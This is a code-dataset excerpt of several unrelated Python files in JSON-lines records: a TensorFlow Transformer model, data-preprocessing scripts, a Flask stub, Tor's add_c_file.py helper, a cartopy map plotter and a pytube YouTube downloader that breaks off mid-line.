0 else hid_size,\n out_size=emb_size if i == 0 else hid_size,\n steps=res_steps,\n dropout=res_dropout)\n for i in range(self.num_layers_dec)]\n\n self.dec_enc_attn = [ResidualLayerWrapper(\n 'dec_enc_attn-%i' % i,\n MultiHeadAttn(\n 'dec_enc_attn-%i' % i,\n inp_size=emb_size if i == 0 else hid_size,\n key_depth=key_size,\n value_depth=value_size,\n output_depth=hid_size,\n num_heads=num_heads,\n attn_dropout=attn_dropout,\n attn_value_dropout=attn_value_dropout,\n debug=debug,\n _format='use_kv' if multihead_attn_format == 'v1' else 'combined',\n ),\n inp_size=emb_size if i == 0 else hid_size,\n out_size=emb_size if i == 0 else hid_size,\n steps=res_steps,\n dropout=res_dropout)\n for i in range(self.num_layers_dec)]\n\n self.dec_ffn = [ResidualLayerWrapper(\n 'dec_ffn-%i' % i,\n FFN(\n 'dec_ffn-%i' % i,\n inp_size=emb_size if i == 0 else hid_size,\n hid_size=ff_size if ff_size else hid_size,\n out_size=hid_size,\n relu_dropout=relu_dropout),\n inp_size=emb_size if i == 0 else hid_size,\n out_size=hid_size,\n steps=res_steps,\n dropout=res_dropout)\n for i in range(self.num_layers_dec)]\n\n if self.normalize_out:\n self.dec_out_norm = LayerNorm('dec_out_norm', inp_size=emb_size if self.num_layers_dec == 0 else hid_size)\n\n def encode(self, inp, inp_len, is_train):\n with dropout_scope(is_train), tf.name_scope(self.name + '_enc') as scope:\n\n # Embeddings\n emb_inp = self.emb_inp(inp) # [batch_size * ninp * emb_dim]\n if self.rescale_emb:\n emb_inp *= self.emb_size ** .5\n emb_inp += self.emb_inp_bias\n\n # Prepare decoder\n enc_attn_mask = self._make_enc_attn_mask(inp, inp_len) # [batch_size * 1 * 1 * ninp]\n\n enc_inp = self._add_timing_signal(emb_inp)\n\n # Apply dropouts\n if is_dropout_enabled():\n enc_inp = tf.nn.dropout(enc_inp, 1.0 - self.res_dropout)\n\n # Encoder\n for layer in range(self.num_layers_enc):\n enc_inp = self.enc_attn[layer](enc_inp, enc_attn_mask)\n enc_inp = self.enc_ffn[layer](enc_inp)\n\n if self.normalize_out:\n enc_inp = self.enc_out_norm(enc_inp)\n\n enc_out = enc_inp\n\n return enc_out, enc_attn_mask\n\n def decode(self, out, out_len, out_reverse, enc_out, enc_attn_mask, is_train):\n with dropout_scope(is_train), tf.name_scope(self.name + '_dec') as scope:\n # Embeddings\n emb_out = self.emb_out(out) # [batch_size * nout * emb_dim]\n if self.rescale_emb:\n emb_out *= self.emb_size ** .5\n\n # Shift right; drop embedding for last word\n emb_out = tf.pad(emb_out, [[0, 0], [1, 0], [0, 0]])[:, :-1, :]\n\n # Prepare decoder\n dec_attn_mask = self._make_dec_attn_mask(out) # [1 * 1 * nout * nout]\n\n offset = 'random' if self.dst_rand_offset else 0\n dec_inp = self._add_timing_signal(emb_out, offset=offset, inp_reverse=out_reverse)\n # Apply dropouts\n if is_dropout_enabled():\n dec_inp = tf.nn.dropout(dec_inp, 1.0 - self.res_dropout)\n\n # bypass info from Encoder to avoid None gradients for num_layers_dec == 0\n if self.num_layers_dec == 0:\n inp_mask = tf.squeeze(tf.transpose(enc_attn_mask, perm=[3,1,2,0]),3)\n dec_inp += tf.reduce_mean(enc_out * inp_mask, axis=[0,1], keep_dims=True)\n\n # Decoder\n for layer in range(self.num_layers_dec):\n dec_inp = self.dec_attn[layer](dec_inp, dec_attn_mask)\n dec_inp = self.dec_enc_attn[layer](dec_inp, enc_attn_mask, enc_out)\n dec_inp = self.dec_ffn[layer](dec_inp)\n\n if self.normalize_out:\n dec_inp = self.dec_out_norm(dec_inp)\n\n dec_out = dec_inp\n return dec_out\n\n def _make_enc_attn_mask(self, inp, inp_len, dtype=tf.float32):\n \"\"\"\n inp = [batch_size * ninp]\n inp_len = [batch_size]\n\n attn_mask = [batch_size * 1 * 1 * ninp]\n \"\"\"\n with tf.variable_scope(\"make_enc_attn_mask\"):\n inp_mask = tf.sequence_mask(inp_len, dtype=dtype, maxlen=tf.shape(inp)[1])\n\n attn_mask = inp_mask[:, None, None, :]\n return attn_mask\n\n def _make_dec_attn_mask(self, out, dtype=tf.float32):\n \"\"\"\n out = [baatch_size * nout]\n\n attn_mask = [1 * 1 * nout * nout]\n \"\"\"\n with tf.variable_scope(\"make_dec_attn_mask\"):\n length = tf.shape(out)[1]\n lower_triangle = tf.matrix_band_part(tf.ones([length, length], dtype=dtype), -1, 0)\n attn_mask = tf.reshape(lower_triangle, [1, 1, length, length])\n return attn_mask\n\n def _add_timing_signal(self, inp, min_timescale=1.0, max_timescale=1.0e4, offset=0, inp_reverse=None):\n \"\"\"\n inp: (batch_size * ninp * hid_dim)\n :param offset: add this number to all character positions.\n if offset == 'random', picks this number uniformly from [-32000,32000] integers\n :type offset: number, tf.Tensor or 'random'\n \"\"\"\n with tf.variable_scope(\"add_timing_signal\"):\n ninp = tf.shape(inp)[1]\n hid_size = tf.shape(inp)[2]\n\n position = tf.to_float(tf.range(ninp))[None, :, None]\n\n if offset == 'random':\n BIG_LEN = 32000\n offset = tf.random_uniform(tf.shape(position), minval=-BIG_LEN, maxval=BIG_LEN, dtype=tf.int32)\n\n # force broadcasting over batch axis\n if isinstance(offset * 1, tf.Tensor): # multiply by 1 to also select variables, special generators, etc.\n assert offset.shape.ndims in (0, 1, 2)\n new_shape = [tf.shape(offset)[i] for i in range(offset.shape.ndims)]\n new_shape += [1] * (3 - len(new_shape))\n offset = tf.reshape(offset, new_shape)\n\n position += tf.to_float(offset)\n\n if inp_reverse is not None:\n position = tf.multiply(\n position,\n tf.where(\n tf.equal(inp_reverse, 0),\n tf.ones_like(inp_reverse, dtype=tf.float32),\n -1.0 * tf.ones_like(inp_reverse, dtype=tf.float32)\n )[:, None, None] # (batch_size * ninp * dim)\n )\n num_timescales = hid_size // 2\n log_timescale_increment = (\n math.log(float(max_timescale) / float(min_timescale)) /\n (tf.to_float(num_timescales) - 1))\n inv_timescales = min_timescale * tf.exp(\n tf.to_float(tf.range(num_timescales)) * -log_timescale_increment)\n\n # scaled_time: [ninp * hid_dim]\n scaled_time = position * inv_timescales[None, None, :]\n signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=-1)\n signal = tf.pad(signal, [[0, 0], [0, 0], [0, tf.mod(hid_size, 2)]])\n return inp + signal\n\n\n# ============================================================================\n# Transformer model\n\nclass Model(TranslateModel):\n\n DecState = namedtuple(\"transformer_state\", ['enc_out', 'enc_attn_mask', 'attnP', 'rdo', 'out_seq', 'offset',\n 'emb', 'dec_layers', 'dec_enc_kv', 'dec_dec_kv'])\n\n def __init__(self, name, inp_voc, out_voc, **hp):\n self.name = name\n self.inp_voc = inp_voc\n self.out_voc = out_voc\n self.hp = hp\n self.debug = hp.get('debug', None)\n\n # Parameters\n self.transformer = Transformer(name, inp_voc, out_voc, **hp)\n\n projection_matrix = None\n if hp.get('dwwt', False):\n projection_matrix = tf.transpose(self.transformer.emb_out.mat)\n\n with tf.variable_scope(name):\n self.logits = Dense('logits', self.transformer.hid_size, len(out_voc),\n W=projection_matrix)\n\n # Train interface\n def symbolic_score(self, inp, out, is_train=False):\n inp_len = infer_length(inp, self.inp_voc.eos, time_major=False)\n out_len = infer_length(out, self.out_voc.eos, time_major=False)\n\n out_reverse = tf.zeros_like(inp_len) # batch['out_reverse']\n\n # rdo: [batch_size * nout * hid_dim]\n enc_out, enc_attn_mask = self.transformer.encode(inp, inp_len, is_train)\n rdo = self.transformer.decode(out, out_len, out_reverse, enc_out, enc_attn_mask, is_train)\n\n return self.logits(rdo)\n\n def encode(self, batch, is_train=False, **kwargs):\n \"\"\"\n :param batch: a dict containing 'inp':int32[batch_size * ninp] and optionally inp_len:int32[batch_size]\n :param is_train: if True, enables dropouts\n \"\"\"\n inp = batch['inp']\n inp_len = batch.get('inp_len', infer_length(inp, self.inp_voc.eos, time_major=False))\n with dropout_scope(is_train), tf.name_scope(self.transformer.name):\n if self.debug:\n inp = tf.Print(inp, [tf.shape(inp), inp], message=\"encode(): inp\", first_n=100, summarize=100)\n\n # Encode.\n enc_out, enc_attn_mask = self.transformer.encode(inp, inp_len, is_train=False)\n\n # Decoder dummy input/output\n ninp = tf.shape(inp)[1]\n batch_size = tf.shape(inp)[0]\n hid_size = tf.shape(enc_out)[-1]\n out_seq = tf.zeros([batch_size, 0], dtype=inp.dtype)\n rdo = tf.zeros([batch_size, hid_size], dtype=enc_out.dtype)\n\n attnP = tf.ones([batch_size, ninp]) / tf.to_float(inp_len)[:, None]\n\n offset = tf.zeros((batch_size,))\n if self.transformer.dst_rand_offset:\n BIG_LEN = 32000\n random_offset = tf.random_uniform(tf.shape(offset), minval=-BIG_LEN, maxval=BIG_LEN, dtype=tf.int32)\n offset += tf.to_float(random_offset)\n\n trans = self.transformer\n empty_emb = tf.zeros([batch_size, 0, trans.emb_size])\n empty_dec_layers = [tf.zeros([batch_size, 0, trans.hid_size])] * trans.num_layers_dec\n input_layers = [empty_emb] + empty_dec_layers[:-1]\n\n #prepare kv parts for all decoder attention layers. Note: we do not preprocess enc_out\n # for each layer because ResidualLayerWrapper only preprocesses first input (query)\n dec_enc_kv = [layer.kv_conv(enc_out)\n for i, layer in enumerate(trans.dec_enc_attn)]\n dec_dec_kv = [layer.kv_conv(layer.preprocess(input_layers[i]))\n for i, layer in enumerate(trans.dec_attn)]\n\n new_state = self.DecState(enc_out, enc_attn_mask, attnP, rdo, out_seq, offset,\n empty_emb, empty_dec_layers, dec_enc_kv, dec_dec_kv)\n\n # perform initial decode (instead of force_bos) with zero embeddings\n new_state = self.decode(new_state, is_train=is_train)\n return new_state\n\n def decode(self, dec_state, words=None, is_train=False, **kwargs):\n \"\"\"\n Performs decoding step given words and previous state.\n Returns next state.\n\n :param words: previous output tokens, int32[batch_size]. if None, uses zero embeddings (first step)\n :param is_train: if True, enables dropouts\n \"\"\"\n trans = self.transformer\n enc_out, enc_attn_mask, attnP, rdo, out_seq, offset, prev_emb = dec_state[:7]\n prev_dec_layers = dec_state.dec_layers\n dec_enc_kv = dec_state.dec_enc_kv\n dec_dec_kv = dec_state.dec_dec_kv\n\n batch_size = tf.shape(rdo)[0]\n if words is not None:\n out_seq = tf.concat([out_seq, tf.expand_dims(words, 1)], 1)\n\n with dropout_scope(is_train), tf.name_scope(trans.name):\n # Embeddings\n if words is None:\n # initial step: words are None\n emb_out = tf.zeros((batch_size, 1, trans.emb_size))\n else:\n emb_out = trans.emb_out(words[:, None]) # [batch_size * 1 * emb_dim]\n if trans.rescale_emb:\n emb_out *= trans.emb_size ** .5\n\n # Prepare decoder\n dec_inp_t = trans._add_timing_signal(emb_out, offset=offset)\n # Apply dropouts\n if is_dropout_enabled():\n dec_inp_t = tf.nn.dropout(dec_inp_t, 1.0 - trans.res_dropout)\n\n # bypass info from Encoder to avoid None gradients for num_layers_dec == 0\n if trans.num_layers_dec == 0:\n inp_mask = tf.squeeze(tf.transpose(enc_attn_mask, perm=[3, 1, 2, 0]), 3)\n dec_inp_t += tf.reduce_mean(enc_out * inp_mask, axis=[0, 1], keep_dims=True)\n\n # Decoder\n new_emb = tf.concat([prev_emb, dec_inp_t], axis=1)\n _out = tf.pad(out_seq, [(0, 0), (0, 1)])\n dec_attn_mask = trans._make_dec_attn_mask(_out)[:, :, -1:, :] # [1, 1, n_q=1, n_kv]\n\n new_dec_layers = []\n new_dec_dec_kv = []\n\n for layer in range(trans.num_layers_dec):\n # multi-head self-attention: use only the newest time-step as query,\n # but all time-steps up to newest one as keys/values\n next_dec_kv = trans.dec_attn[layer].kv_conv(trans.dec_attn[layer].preprocess(dec_inp_t))\n new_dec_dec_kv.append(tf.concat([dec_dec_kv[layer], next_dec_kv], axis=1))\n dec_inp_t = trans.dec_attn[layer](dec_inp_t, dec_attn_mask, kv=new_dec_dec_kv[layer])\n\n dec_inp_t = trans.dec_enc_attn[layer](dec_inp_t, enc_attn_mask, kv=dec_enc_kv[layer])\n dec_inp_t = trans.dec_ffn[layer](dec_inp_t)\n\n new_dec_inp = tf.concat([prev_dec_layers[layer], dec_inp_t], axis=1)\n new_dec_layers.append(new_dec_inp)\n\n if trans.normalize_out:\n dec_inp_t = trans.dec_out_norm(dec_inp_t)\n\n rdo = dec_inp_t[:, -1]\n\n new_state = self.DecState(enc_out, enc_attn_mask, attnP, rdo, out_seq, offset + 1,\n new_emb, new_dec_layers, dec_enc_kv, new_dec_dec_kv)\n return new_state\n\n def get_rdo(self, dec_state, **kwargs):\n return dec_state.rdo, dec_state.out_seq\n\n def get_attnP(self, dec_state, **kwargs):\n return dec_state.attnP\n\n def get_logits(self, dec_state, **flags):\n return self.logits(dec_state.rdo)\n","sub_path":"models/transformer_other.py","file_name":"transformer_other.py","file_ext":"py","file_size_in_byte":27105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"252483446","text":"#-*- coding=utf-8-*-\n\nimport os\nimport os.path\nimport numpy as np\nimport functools\nimport sys\nimport random\n\n# 建立各种路径\nroot = '/mnt/lustre/niuyazhe'\ntrain_seg = os.path.join(root, 'data/BDCI/train_set/category')\nrate_list = []\n\ndef get_file_rate(num):\n all_train_file = os.listdir(train_seg)\n all_train_file = random.sample(all_train_file, num)\n\n i = 0\n for train_file in all_train_file:\n rates = [0 for k in range(8)]\n content = list(np.loadtxt(os.path.join(train_seg, train_file)).astype(np.int64).tolist())\n for j in content:\n rates[j] += 1\n rates = [rates[i] / len(content) for i in range(8)]\n rate_list.append([train_file, rates])\n print(train_file + ' ' + str(i))\n i += 1\n\n with open(os.path.join(root, 'data/BDCI/rate.txt'), 'w') as rate_file:\n output = '\\n'\n rates = [0 for k in range(8)]\n for pair in rate_list:\n output += (pair[0] + ' ' + str(pair[1]) + '\\n')\n rates = [rates[i] + pair[1][i] for i in range(8)]\n rates = [rates[i] / num for i in range(8)]\n print(rates)\n rate_file.writelines(output)\n\nif __name__ == '__main__':\n get_file_rate(int(sys.argv[1]))","sub_path":"get_file_rate.py","file_name":"get_file_rate.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127929690","text":"import os\nfrom parser import Parser\nimport json\nimport argparse\n\n\ndef get_data_paths(ace2005_path):\n test_files, dev_files, train_files = [], [], []\n\n with open('./data_list.csv', mode='r') as csv_file:\n rows = csv_file.readlines()\n for row in rows[1:]:\n items = row.replace('\\n', '').split(',')\n data_type = items[0]\n name = items[1]\n\n path = os.path.join(ace2005_path, name + '.apf.xml')\n if data_type == 'test':\n test_files.append(path)\n elif data_type == 'dev':\n dev_files.append(path)\n elif data_type == 'train':\n train_files.append(path)\n return test_files, dev_files, train_files\n\n\ndef preprocessing(data_type, files):\n data = []\n for file in files:\n data.extend(Parser(xml_path=file).get_data())\n with open('output/{}.json'.format(data_type), 'w') as f:\n json.dump(data, f, indent=2)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--data', help=\"Path of ACE2005 English data\", default='./data/ace_2005_td_v7/data/English')\n args = parser.parse_args()\n test_files, dev_files, train_files = get_data_paths(args.data)\n preprocessing('test', test_files)\n preprocessing('train', train_files)\n preprocessing('dev', dev_files)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"606155149","text":"# -*- coding: utf-8 -*-\r\nfrom flask import Flask \r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_marshmallow import Marshmallow\r\n\r\n\r\napp = None\r\ndb = None\r\n\r\napp = Flask(__name__) # create the application instance :)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///db.sqlite\"\r\ndb = SQLAlchemy(app)\r\nma = Marshmallow(app)\r\n\r\ndel Flask\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"219094077","text":"#!/usr/bin/env python3\n\n\"\"\"\n Add a C file with matching header to the Tor codebase. Creates\n both files from templates, and adds them to the right include.am file.\n\n Example usage:\n\n % add_c_file.py ./src/feature/dirauth/ocelot.c\n\"\"\"\n\nimport os\nimport re\nimport time\n\ndef topdir_file(name):\n \"\"\"Strip opening \"src\" from a filename\"\"\"\n if name.startswith(\"src/\"):\n name = name[4:]\n return name\n\ndef guard_macro(name):\n \"\"\"Return the guard macro that should be used for the header file 'name'.\n \"\"\"\n td = topdir_file(name).replace(\".\", \"_\").replace(\"/\", \"_\").upper()\n return \"TOR_{}\".format(td)\n\ndef makeext(name, new_extension):\n \"\"\"Replace the extension for the file called 'name' with 'new_extension'.\n \"\"\"\n base = os.path.splitext(name)[0]\n return base + \".\" + new_extension\n\ndef instantiate_template(template, output_fname):\n \"\"\"\n Fill in a template with string using the fields that should be used\n for 'output_fname'.\n \"\"\"\n names = {\n # The relative location of the header file.\n 'header_path' : makeext(topdir_file(output_fname), \"h\"),\n # The relative location of the C file file.\n 'c_file_path' : makeext(topdir_file(output_fname), \"c\"),\n # The truncated name of the file.\n 'short_name' : os.path.basename(output_fname),\n # The current year, for the copyright notice\n 'this_year' : time.localtime().tm_year,\n # An appropriate guard macro, for the header.\n 'guard_macro' : guard_macro(output_fname),\n }\n\n return template.format(**names)\n\nHEADER_TEMPLATE = \"\"\"\\\n/* Copyright (c) 2001 Matej Pfajfar.\n * Copyright (c) 2001-2004, Roger Dingledine.\n * Copyright (c) 2004-2006, Roger Dingledine, Nick Mathewson.\n * Copyright (c) 2007-{this_year}, The Tor Project, Inc. */\n/* See LICENSE for licensing information */\n\n/**\n * @file {short_name}\n * @brief Header for {c_file_path}\n **/\n\n#ifndef {guard_macro}\n#define {guard_macro}\n\n#endif /* !defined({guard_macro}) */\n\"\"\"\n\nC_FILE_TEMPLATE = \"\"\"\\\n/* Copyright (c) 2001 Matej Pfajfar.\n * Copyright (c) 2001-2004, Roger Dingledine.\n * Copyright (c) 2004-2006, Roger Dingledine, Nick Mathewson.\n * Copyright (c) 2007-{this_year}, The Tor Project, Inc. */\n/* See LICENSE for licensing information */\n\n/**\n * @file {short_name}\n * @brief DOCDOC\n **/\n\n#include \"orconfig.h\"\n#include \"{header_path}\"\n\"\"\"\n\nclass AutomakeChunk:\n \"\"\"\n Represents part of an automake file. If it is decorated with\n an ADD_C_FILE comment, it has a \"kind\" based on what to add to it.\n Otherwise, it only has a bunch of lines in it.\n \"\"\"\n pat = re.compile(r'# ADD_C_FILE: INSERT (\\S*) HERE', re.I)\n\n def __init__(self):\n self.lines = []\n self.kind = \"\"\n\n def addLine(self, line):\n \"\"\"\n Insert a line into this chunk while parsing the automake file.\n \"\"\"\n m = self.pat.match(line)\n if m:\n if self.lines:\n raise ValueError(\"control line not preceded by a blank line\")\n self.kind = m.group(1)\n\n self.lines.append(line)\n if line.strip() == \"\":\n return True\n\n return False\n\n def insertMember(self, member):\n \"\"\"\n Add a new member to this chunk. Try to insert it in alphabetical\n order with matching indentation, but don't freak out too much if the\n source isn't consistent.\n\n Assumes that this chunk is of the form:\n FOOBAR = \\\n X \\\n Y \\\n Z\n \"\"\"\n prespace = \"\\t\"\n postspace = \"\\t\\t\"\n for lineno, line in enumerate(self.lines):\n m = re.match(r'(\\s+)(\\S+)(\\s+)\\\\', line)\n if not m:\n continue\n prespace, fname, postspace = m.groups()\n if fname > member:\n self.insert_before(lineno, member, prespace, postspace)\n return\n self.insert_at_end(member, prespace, postspace)\n\n def insert_before(self, lineno, member, prespace, postspace):\n self.lines.insert(lineno,\n \"{}{}{}\\\\\\n\".format(prespace, member, postspace))\n\n def insert_at_end(self, member, prespace, postspace):\n lastline = self.lines[-1]\n self.lines[-1] += '{}\\\\\\n'.format(postspace)\n self.lines.append(\"{}{}\\n\".format(prespace, member))\n\n def dump(self, f):\n \"\"\"Write all the lines in this chunk to the file 'f'.\"\"\"\n for line in self.lines:\n f.write(line)\n if not line.endswith(\"\\n\"):\n f.write(\"\\n\")\n\nclass ParsedAutomake:\n \"\"\"A sort-of-parsed automake file, with identified chunks into which\n headers and c files can be inserted.\n \"\"\"\n def __init__(self):\n self.chunks = []\n self.by_type = {}\n\n def addChunk(self, chunk):\n \"\"\"Add a newly parsed AutomakeChunk to this file.\"\"\"\n self.chunks.append(chunk)\n self.by_type[chunk.kind.lower()] = chunk\n\n def add_file(self, fname, kind):\n \"\"\"Insert a file of kind 'kind' to the appropriate section of this\n file. Return True if we added it.\n \"\"\"\n if kind.lower() in self.by_type:\n self.by_type[kind.lower()].insertMember(fname)\n return True\n else:\n return False\n\n def dump(self, f):\n \"\"\"Write this file into a file 'f'.\"\"\"\n for chunk in self.chunks:\n chunk.dump(f)\n\ndef get_include_am_location(fname):\n \"\"\"Find the right include.am file for introducing a new file. Return None\n if we can't guess one.\n\n Note that this function is imperfect because our include.am layout is\n not (yet) consistent.\n \"\"\"\n td = topdir_file(fname)\n m = re.match(r'^lib/([a-z0-9_]*)/', td)\n if m:\n return \"src/lib/{}/include.am\".format(m.group(1))\n\n if re.match(r'^(core|feature|app)/', td):\n return \"src/core/include.am\"\n\n if re.match(r'^test/', td):\n return \"src/test/include.am\"\n\n return None\n\ndef run(fn):\n \"\"\"\n Create a new C file and H file corresponding to the filename \"fn\", and\n add them to include.am.\n \"\"\"\n\n cf = makeext(fn, \"c\")\n hf = makeext(fn, \"h\")\n\n if os.path.exists(cf):\n print(\"{} already exists\".format(cf))\n return 1\n if os.path.exists(hf):\n print(\"{} already exists\".format(hf))\n return 1\n\n with open(cf, 'w') as f:\n f.write(instantiate_template(C_FILE_TEMPLATE, cf))\n\n with open(hf, 'w') as f:\n f.write(instantiate_template(HEADER_TEMPLATE, hf))\n\n iam = get_include_am_location(cf)\n if iam is None or not os.path.exists(iam):\n print(\"Made files successfully but couldn't identify include.am for {}\"\n .format(cf))\n return 1\n\n amfile = ParsedAutomake()\n cur_chunk = AutomakeChunk()\n with open(iam) as f:\n for line in f:\n if cur_chunk.addLine(line):\n amfile.addChunk(cur_chunk)\n cur_chunk = AutomakeChunk()\n amfile.addChunk(cur_chunk)\n\n amfile.add_file(cf, \"sources\")\n amfile.add_file(hf, \"headers\")\n\n with open(iam+\".tmp\", 'w') as f:\n amfile.dump(f)\n\n os.rename(iam+\".tmp\", iam)\n\nif __name__ == '__main__':\n import sys\n sys.exit(run(sys.argv[1]))\n","sub_path":"src/tor/scripts/maint/add_c_file.py","file_name":"add_c_file.py","file_ext":"py","file_size_in_byte":7281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"468484512","text":"\"\"\"Plot map of shapefile\n\"\"\"\n# pylint: disable=C0103\nimport argparse\nimport os\n\nimport cartopy.crs as ccrs\nimport cartopy.io.shapereader as shpreader\nimport matplotlib.pyplot as plt\n\ndef plot_shapes(path):\n plt.figure(figsize=(6, 6), dpi=150)\n proj = ccrs.OSGB()\n ax = plt.axes(projection=proj)\n ax.outline_patch.set_visible(False)\n\n geoms = []\n for record in shpreader.Reader(path).records():\n geoms.append(record.geometry)\n\n ax.add_geometries(geoms, crs=proj, edgecolor='white', facecolor='#efefef')\n\n output_filename = os.path.join(\n os.getcwd(),\n 'map.png'\n )\n plt.savefig(output_filename)\n\n\ndef add_geoms_by_attribute(path, ax):\n \"\"\"Example adding geometries with categorical color\n \"\"\"\n # set up a dict to hold geometries keyed by our key\n geoms_by_key = defaultdict(list)\n # here we hardcode colors by key - could use other methods (interpolation, lookup...)\n colors_by_key = {\n 'a': '#ff0000',\n 'b': '#00ff00',\n 'c': '#0000ff'\n }\n\n # for each records, pick out our key's value from the record\n # and store the geometry in the relevant list under geoms_by_key\n for record in shpreader.Reader(path).records():\n key = record.attributes['key']\n geoms_by_key[key].append(record.geometry)\n\n # now we have all the geometries in lists for each value of our key\n # add them to the axis, using the relevant color as facecolor\n for key, geoms in geoms_by_key:\n color = colors_by_key[key]\n ax.add_geometries(geoms, crs=proj, edgecolor='white', facecolor=color)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Plot a shapefile.')\n parser.add_argument('path', help='path to the shapefile to plot')\n args = parser.parse_args()\n\n plot_shapes(args.path)","sub_path":"energy_demand/plotting/choropleth_mapping.py","file_name":"choropleth_mapping.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22852959","text":"# -*- coding:utf-8 -*-\r\n\r\n# Imports\r\nfrom pytube import YouTube, Playlist\r\nimport os\r\nimport shutil\r\nfrom pyfiglet import figlet_format as ff\r\nfrom random import randint\r\n\r\n\r\n# Function to Download a single video\r\ndef single(url):\r\n yt = YouTube(url)\r\n print(\"[-] Now Downloading %s\\n\" % yt.title)\r\n tell = yt.streams.all()\r\n print('[+] Id: 0\\t\\tAUDIO ONLY')\r\n for x in yt.streams.all():\r\n if str(x.resolution)!='None' and str(x.mime_type) == 'video/webm':\r\n print('[+] Id: '+str(x.itag), '\\tResolution: '+str(x.resolution)+'\\t'+str(x.filesize//(1024*1024))+' mb')\r\n\r\n tag = int(input('[+] Resolution Id: '))\r\n if tag!=0:\r\n try:\r\n try:shutil.rmtree('videok9')\r\n except:pass\r\n os.mkdir('videok9')\r\n print('[-] Video Download Started: ',yt.title)\r\n yt.streams.get_by_itag(tag).download('videok9')\r\n vname = os.listdir('videok9')[0]\r\n except Exception as e:print('[-]', e)\r\n\r\n l=[]\r\n for x in yt.streams.all():\r\n if str(x.mime_type) in ['audio/webm', 'audio/mp4']:\r\n l.append((str(x.itag), str(x.abr), str(x.mime_type)[6:], str(x.audio_codec), x.default_filename))\r\n for x in l:\r\n if x[3] in ['vorbis', 'mp4a.40.2']:\r\n atag = int(x[0])\r\n aname = x[-1]\r\n if x[3] == 'vorbis':\r\n break\r\n else:\r\n atag = int(l[0][0])\r\n\r\n print(\"[-] Audio Download Started.\\n\")\r\n yt.streams.get_by_itag(atag).download()\r\n\r\n if tag!=0:\r\n try:\r\n print(\"[-] Merging using ffmpeg.\\n\")\r\n os.system(\"ffmpeg -i \\\"videok9/\"+vname+\"\\\" -i \\\"\"+aname+\"\\\" -ab 192k -r 27 -shortest \\\"\"+vname.split('.')[0]+'_.mp4'\"\\\"\")\r\n shutil.rmtree('videok9')\r\n os.remove(aname)\r\n print(' [S][U][C][C][E][S][S] ')\r\n except Exception as e:\r\n print(e)\r\n else:\r\n output = input(\"[+] Transcode in mp3 from webm/mp4a?: Press 1 else Enter \")\r\n if output=='1':\r\n os.system(\"ffmpeg -i \\\"\"+aname+\"\\\" -ab 192 \\\"\"+aname.split('.')[0]+\"_.mp3\"+\"\\\"\")\r\n os.remove(aname)\r\n print(' [S][U][C][C][E][S][S] ')\r\n\r\n\r\n# Playlist Download\r\ndef playlist(url):\r\n pl = Playlist(url)\r\n pl.populate_video_urls() # We need t populate it otherwise video_urls will give an empty list.\r\n videos = pl.video_urls\r\n #print(videos)\r\n #print('second')\r\n tag = int(input(\"\"\"\r\n >> Enter 0 to download Audio only.\r\n >> Enter Video-Resolution ID to be downloaded.\r\n >> Ex. '247' without quotes for 720p res.\r\n\r\n \r\n Available Resolutions\\n:\r\n [+] ID: 248 1080p\r\n [+] ID: 247 720p\r\n [+] ID: 244 480p\r\n [+] ID: 243 360p\r\n [+] ID: 242 240p\r\n [+] ID: 278 144p\\n\r\n \"\"\"))\r\n print('>>> Script is executed Successfully.')\r\n print('>>> Give a star if it helps you. It will encorage me :)')\r\n print('>>> ffmpeg console will appear, ignore it. Do not close or else merge will fail.')\r\n if tag != 0:\r\n for iurl in videos:\r\n yt = YouTube(iurl)\r\n try:\r\n try:shutil.rmtree('videok9')\r\n except:pass\r\n os.mkdir('videok9')\r\n yt.streams.get_by_itag(tag).download('videok9')\r\n print(\"[-] Success: \", yt.title)\r\n vname = os.listdir('videok9')[0]\r\n make_needed = True\r\n except Exception as e:\r\n make_needed = False\r\n if str(e) == \"'NoneType' object has no attribute 'download'\":\r\n print(\"[*] Format decreased for: \",yt.title)\r\n try:\r\n yt.streams.filter(progressive=True).order_by('resolution').desc().first().download()\r\n print(\"[-] success: \", yt.title)\r\n except:\r\n print('[*]', yt.title, ' ::is skipped fully. Please download using command line.')\r\n \r\n if make_needed: #not needed means audio and video are present already.\r\n l=[]\r\n for x in yt.streams.all():\r\n if str(x.mime_type) in ['audio/webm', 'audio/mp4']:\r\n l.append((str(x.itag), str(x.abr), str(x.mime_type)[6:], str(x.audio_codec), x.default_filename))\r\n for x in l:\r\n if x[3] in ['vorbis', 'mp4a.40.2']:\r\n atag = int(x[0])\r\n aname = x[-1]\r\n if x[3] == 'vorbis':\r\n break\r\n else:\r\n atag = int(l[0][0])\r\n\r\n yt.streams.get_by_itag(atag).download()\r\n \r\n try:\r\n os.system(\"ffmpeg -i \\\"videok9/\"+vname+\"\\\" -i \\\"\"+aname+\"\\\" -ab 160k -r 27 -shortest \\\"\"+vname.split('.')[0]+'_.mp4'\"\\\"\")\r\n shutil.rmtree('videok9')\r\n os.remove(aname)\r\n print(\" [S][U][C][C][E][S][S] \")\r\n except Exception as e:\r\n print('[*]', e)\r\n print(\"[*] Make sure ffmpeg is added in Environment Variable.\")\r\n else:pass\r\n \r\n elif tag == 0:\r\n output = input(\"[+] Transcode in mp3 from webm/mp4a?: Press 1 else Enter \")\r\n for iurl in videos:\r\n aname = yt.streams.filter(only_audio=True).first().default_filename\r\n yt = YouTube(iurl)\r\n print('[-] success: ',yt.title)\r\n yt.streams.filter(only_audio=True).first().download()\r\n if output=='1':\r\n os.system(\"ffmpeg -i \\\"\"+aname+\"\\\" 